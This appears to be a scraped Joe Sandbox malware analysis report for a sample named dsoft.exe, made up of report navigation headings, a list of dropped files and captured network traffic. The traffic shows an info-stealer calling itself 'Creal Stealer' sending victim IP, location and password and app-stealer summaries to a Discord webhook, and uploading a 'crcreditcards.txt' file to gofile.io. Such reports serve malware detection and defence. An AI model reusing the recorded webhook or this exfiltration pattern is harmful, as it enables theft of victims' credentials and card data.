2024-12-29 19:02:53 UTC	195	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 65 34 36 30 33 30 36 32 64 34 36 32 33 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 72 63 72 65 64 69 74 63 61 72 64 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 65 34 36 30 33 30 36 32 64 34 36 32 33 64 38 2d 2d 0d 0a Data Ascii: --------------------------8e4603062d4623d8Content-Disposition: form-data; name="file"; filename="crcreditcards.txt"Content-Type: text/plain--------------------------8e4603062d4623d8--
2024-12-29 19:02:56 UTC	449	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Sun, 29 Dec 2024 19:02:55 GMT Content-Type: application/json Content-Length: 732 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-12-29 19:02:56 UTC	732	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 35 34 39 38 39 37 35 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 71 45 62 33 71 6a 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 50 7a 56 66 66 57 6d 7a 6f 4e 72 6d 52 66 58 71 59 50 49 7a 6d 61 36 66 7a 76 71 7a 31 6e 48 57 22 2c 22 69 64 22 3a 22 63 33 30 61 30 32 33 38 2d 32 65 64 32 2d 34 38 65 31 2d 39 31 39 39 2d 37 37 63 63 66 61 61 36 34 62 35 63 22 2c 22 6d 64 35 22 3a 22 64 34 31 64 38 63 64 39 38 66 30 30 62 32 30 34 65 39 38 30 30 39 39 38 65 63 66 38 34 32 37 65 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 74 65 78 74 2f 70 6c 61 69 6e 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 35 34 39 38 39 37 35 2c Data Ascii: {"data":{"createTime":1735498975,"downloadPage":"https://gofile.io/d/qEb3qj","guestToken":"PzVffWmzoNrmRfXqYPIzma6fzvqz1nHW","id":"c30a0238-2ed2-48e1-9199-77ccfaa64b5c","md5":"d41d8cd98f00b204e9800998ecf8427e","mimetype":"text/plain","modTime":1735498975,

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dsoft.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_ARC4.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_Salsa20.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_chacha20.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_pkcs1_decode.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_aes.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_aesni.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_arc2.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_blowfish.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cast.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cbc.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cfb.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ctr.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_des.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_des3.pyd

C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ecb.pyd

Windows Analysis Report
dsoft.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:54 UTC	332	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 420 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-12-29 19:02:54 UTC	420	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 41 70 70 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 79 68 75 75 75 2f 43 72 65 61 6c Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| App Stealer", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer", "icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal
2024-12-29 19:02:54 UTC	1259	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:02:54 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498975 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWM%2FrKfFzfzUP1Mfk5hyZNyIrqdG1utgWtPOPdVPptas%2FwCWT%2F4HVbSmJbX8APN5qLkO7r2s%2BkJvMoS4wFSdwnVrgBPGm7f2MalBto1cMr3oI%2Fl6btE0yOH6reWA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=0f05533984d6908e46ef45dac808328d15271110-1735498974; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=KuizxNPIEs1sXO4xGzStJLPpFyQ3ydTiq9rBC5PknGQ-1735498974462-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0c0e0cb92363-EWR
2024-12-29 19:02:54 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:55 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.10 Connection: close
2024-12-29 19:02:55 UTC	424	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 19:02:55 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f9c0c153b9a8cb9-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1978&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=709&delivery_rate=1431372&cwnd=183&unsent_bytes=0&cid=3ee70ea2a6ec77c3&ts=466&x=0"
2024-12-29 19:02:55 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:57 UTC	126	OUT	GET /getServer HTTP/1.1 Accept-Encoding: identity Host: api.gofile.io User-Agent: Python-urllib/3.10 Connection: close
2024-12-29 19:02:57 UTC	1113	IN	HTTP/1.1 404 Not Found Server: nginx/1.27.1 Date: Sun, 29 Dec 2024 19:02:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 14 Connection: close Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type, Authorization Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD Access-Control-Allow-Credentials: true Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-DNS-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 0 ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
2024-12-29 19:02:57 UTC	14	IN	Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64 Data Ascii: error-notFound

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:58 UTC	333	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 1787 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-12-29 19:02:58 UTC	1787	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 46 6f 75 6e 64 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 50 61 73 73 77 6f 72 64 73 20 46 6f 75 6e 64 5c 6e 3c 61 3a 43 48 5f 49 63 6f 6e 41 72 72 6f 77 52 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| Password Stealer", "description": "Found:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0 Passwords Found\n<a:CH_IconArrowRi
2024-12-29 19:02:59 UTC	1251	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:02:59 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498980 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=al14tV3RO5HAUGlpzldwbNVdyOqSgAYjGAGFl4u9J%2BcEcrKeUkb72GhVyFq5a9Ky84w2Bp5mq4I4sw0FeQVfqtietjjAnh1BOzkJj6gv7FtFwM86yxaFxgvn7O0p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=4ad72b55e11a23022160cd227dced0a61e8bc086-1735498979; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=3mp86m6fg2yt6TrvqhFhIX3HYUwXx6EX7Cx2XPSFZHg-1735498979222-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0c2b3b6d6a52-EWR
2024-12-29 19:02:59 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:02:59 UTC	140	OUT	GET /jsonp/8.46.123.189 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.10 Connection: close
2024-12-29 19:03:00 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Sun, 29 Dec 2024 19:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-12-29 19:03:00 UTC	172	IN	Data Raw: 61 31 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a1callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.189","state":null})0

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:03:01 UTC	332	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 420 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-12-29 19:03:01 UTC	420	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 41 70 70 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 79 68 75 75 75 2f 43 72 65 61 6c Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| App Stealer", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer", "icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal
2024-12-29 19:03:02 UTC	1253	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:03:02 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498983 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ew2eSJHs21nMyIaCjS1fgAB0hIte%2BxNqw079TaXbkJeR2kBRXsRDEFS1ke8E771MYFhMKHTcR%2BNnaMv5nekeQQ7xaAScDPrMvqA27kIgu1zTD0h53XctQdusGxEu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=a83e1b02b8bf0e6c4fe8f6315cbb2f437fc4f7b6-1735498982; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=sDbDnP8c3EQsAzdxnKSvOTrh8pv1NFi2WqQ8ocMCSi0-1735498982119-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0c3ddc55726b-EWR
2024-12-29 19:03:02 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:03:03 UTC	332	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 420 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-12-29 19:03:03 UTC	420	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 41 70 70 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 79 68 75 75 75 2f 43 72 65 61 6c Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| App Stealer", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer", "icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal
2024-12-29 19:03:04 UTC	1261	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:03:03 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498985 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dz10feN7fAn99NPMZP773e%2FFXNtbjo%2BKdyH0xJmtsLNoAHsgKkPCzK%2FYVKg%2B92W%2FAPyxxiNNk7lOukeltG%2FQRYsoshBYvtWWIpEbjMe3udtBQPhrLSAh4Frw1OoB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=9e3e66dc681d70b9937e1195946526fe189d7f3e-1735498983; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=Q1t2swnpuPMmYcqSWEivjLPu1w11cnctRRnKVlKNp5o-1735498983981-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0c4978d7c46b-EWR
2024-12-29 19:03:04 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:03:05 UTC	332	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 420 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-12-29 19:03:05 UTC	420	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 4a 4f 4e 45 53 20 7c 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 41 70 70 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 79 68 75 75 75 2f 43 72 65 61 6c Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.189 (United States)`", "embeds": [{"title": "Creal Stealer \| App Stealer", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer", "icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal
2024-12-29 19:03:06 UTC	1255	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 19:03:05 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735498987 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y66lmSQjYqsL0eNaQvvIJkkpXxVp4%2Fgx%2FuYk%2BwzB4A5JLjXfQaYCaxDsd62qlQ0w2elCKRHjllh473aNq6Rb0zA709LCmdxGsdhJw5H2kphtmk4vZ6u0OYPyh6IL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=29a15a11205d521fade2fce24bb51dc81e422ff7-1735498985; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=h_xZ24ShyDMMmxOICgAN9wP.Mrjy0u4wF8iOCpj4Bzg-1735498985928-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f9c0c558a715e6d-EWR
2024-12-29 19:03:06 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Timestamp	Bytes transferred	Direction	Data
2024-12-29 19:03:07 UTC	332	OUT	POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1 Accept-Encoding: identity Content-Length: 420 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
